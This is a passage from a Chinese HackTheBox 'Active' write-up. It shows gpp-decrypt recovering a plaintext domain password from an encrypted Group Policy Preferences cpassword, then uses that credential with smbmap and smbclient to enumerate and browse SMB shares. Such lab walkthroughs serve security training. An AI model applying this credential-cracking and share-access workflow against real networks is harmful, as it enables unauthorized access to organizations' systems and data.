|
只要创建了一个新的GPP(组策略首选项),都会在SYSVOL share中创建一个数据配置的xml文件,,包括任何与GPP相关的密码。不过,为了安全起见,在存储之前,Microsoft AES对密码进行了加密处理。但是,Microsoft又在MSDN上发布了秘钥。
微软在2014年发布了一个补丁,防止管理员将密码写入GPP。但是这个补丁对于那些已存在的可破解的密码不起任何作用。而且据我所知,渗透测试员在2018年也经常能够发现这些秘钥。更多详情,请看这篇博客:AD security。
破解GPP密码
既然得到了秘钥,我们就可以进行破解了。Kali上有一个工具gpp-decrypt可以破解:
- root@kali:~/hackthebox/active-10.10.10.100/smb-loot# gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
- GPPstillStandingStrong2k18
用户共享-SMB
有了用户名和密码,我又能多访问3个share了。
- root@kali:~/hackthebox/active-10.10.10.100/smb-loot# smbmap -H 10.10.10.100 -d active.htb -u SVC_TGS -p GPPstillStandingStrong2k18
- [+] Finding open SMB ports....
- [+] User SMB session establishd on 10.10.10.100...
- [+] IP: 10.10.10.100:445 Name: 10.10.10.100
- Disk Permissions
- ---- -----------
- ADMIN$ NO ACCESS
- C$ NO ACCESS
- IPC$ NO ACCESS
- NETLOGON READ ONLY
- Replication READ ONLY
- SYSVOL READ ONLY
- Users READ ONLY
当我连接到用户共享时,看起来有点像是C:Users目录,事实上就是这个目录:
- root@kali:~/hackthebox/active-10.10.10.100# smbclient //10.10.10.100/Users -U active.htbSVC_TGS%GPPstillStandingStrong2k18
- Try "help" to get a list of possible commands.
- smb: > dir
- . DR 0 Sat Jul 21 10:39:20 2018
- .. DR 0 Sat Jul 21 10:39:20 2018
- Administrator D 0 Mon Jul 16 06:14:21 2018
- All Users DHS 0 Tue Jul 14 01:06:44 2009
- Default DHR 0 Tue Jul 14 02:38:21 2009
- Default User DHS 0 Tue Jul 14 01:06:44 2009
- desktop.ini AHS 174 Tue Jul 14 00:57:55 2009
- Public DR 0 Tue Jul 14 00:57:55 2009
- SVC_TGS D 0 Sat Jul 21 11:16:32 2018
-
- 10459647 blocks of size 4096. 6308502 blocks available
(编辑:南平站长网)
【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容!
|
